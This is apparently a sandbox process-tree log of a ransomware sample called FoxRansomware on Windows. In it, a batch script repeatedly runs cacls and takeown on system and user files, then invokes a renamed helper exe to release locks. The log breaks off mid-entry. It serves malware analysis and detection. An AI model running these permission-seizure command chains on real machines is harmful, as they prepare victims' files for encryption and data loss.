level 2 | PID 1528 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  level 3 | PID 5100 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
  level 3 | PID 4596 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
  level 3 | PID 4860 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner
    level 4 | PID 6800 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "resource.xml" -nobanner
  level 3 | PID 3316 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 4004 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  level 3 | PID 5808 | C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  level 3 | PID 5832 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
  level 3 | PID 7620 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
  level 3 | PID 4848 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner
    level 4 | PID 1692 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "resource.xml" -nobanner
  level 3 | PID 6092 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 7608 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:1684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat"3⤵PID:6808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:5928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""2⤵PID:6220
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7196
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C3⤵PID:6848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"3⤵PID:8100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner3⤵PID:4572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner4⤵PID:3664
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""2⤵PID:6124
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C3⤵PID:4748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"3⤵
- Modifies file permissions
PID:3264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner3⤵PID:7212
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner4⤵PID:3752
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""2⤵PID:4456
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C3⤵PID:7280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"3⤵
- Modifies file permissions
PID:6164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "ThemeSettings2013.xml" -nobanner3⤵PID:5140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "ThemeSettings2013.xml" -nobanner4⤵PID:7248
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl""2⤵PID:5332
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6316
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl" /E /G Admin:F /C3⤵PID:7664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl"3⤵PID:7176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl" -nobanner3⤵PID:5968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl" -nobanner4⤵PID:7292
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl""2⤵PID:7364
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl" /E /G Admin:F /C3⤵PID:4856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl"3⤵PID:7688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl" -nobanner3⤵PID:7420
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl" -nobanner4⤵PID:7740
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl""2⤵PID:1524
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl" /E /G Admin:F /C3⤵PID:7192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl"3⤵PID:7796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl" -nobanner3⤵PID:7752
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl" -nobanner4⤵PID:7748
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm""2⤵PID:6644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm" /E /G Admin:F /C3⤵PID:6288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm"3⤵
- Modifies file permissions
PID:7984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "ActivitiesCache.db-shm" -nobanner3⤵PID:7052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "ActivitiesCache.db-shm" -nobanner4⤵PID:5576
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2""2⤵PID:300
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2" /E /G Admin:F /C3⤵PID:1920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2"3⤵PID:8188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "settings.dat.LOG2" -nobanner3⤵PID:3388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "settings.dat.LOG2" -nobanner4⤵PID:3708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""2⤵PID:8008
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C3⤵PID:6500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"3⤵
- Modifies file permissions
PID:5476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "TileCache_100_0_Header.bin" -nobanner3⤵PID:5848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "TileCache_100_0_Header.bin" -nobanner4⤵PID:5864
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5280
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:7040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:6496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵PID:7080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "behavior.xml" -nobanner3⤵PID:6684
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "behavior.xml" -nobanner4⤵PID:6428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4060
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:6544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:6988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵
- Modifies file permissions
PID:6752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:4288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:7012
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:3536
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6636
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:6924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:7044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:6616
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:5788
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:4128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:5628
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"3⤵
- Modifies file permissions
PID:6488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:7096
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵PID:4164
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""2⤵PID:5516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C3⤵PID:6780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"3⤵PID:6212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner3⤵PID:2680
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner4⤵PID:4760
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""2⤵PID:2932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C3⤵PID:7128
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"3⤵PID:1128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner3⤵PID:7124
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner4⤵PID:5564
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""2⤵PID:3284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C3⤵PID:5496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"3⤵PID:4532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "ThemeSettings2013.xml" -nobanner3⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "ThemeSettings2013.xml" -nobanner4⤵PID:2544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl""2⤵PID:1356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl" /E /G Admin:F /C3⤵PID:5168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl"3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl" -nobanner3⤵PID:5300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.1.etl" -nobanner4⤵PID:2920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl""2⤵PID:6768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl" /E /G Admin:F /C3⤵PID:6108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl"3⤵PID:5528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl" -nobanner3⤵PID:5920
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "WuProvider.f1d9b747-3232-410f-9fe7-382f57674b45.1.etl" -nobanner4⤵PID:5612
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:1056
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:6460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:7220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "overlay.png" -nobanner3⤵PID:5148
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "overlay.png" -nobanner4⤵PID:5452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:1416
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:6592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:5272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:7588
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵PID:5296
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""2⤵PID:2808
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml" /E /G Admin:F /C3⤵PID:5844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"3⤵PID:7004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner3⤵PID:4992
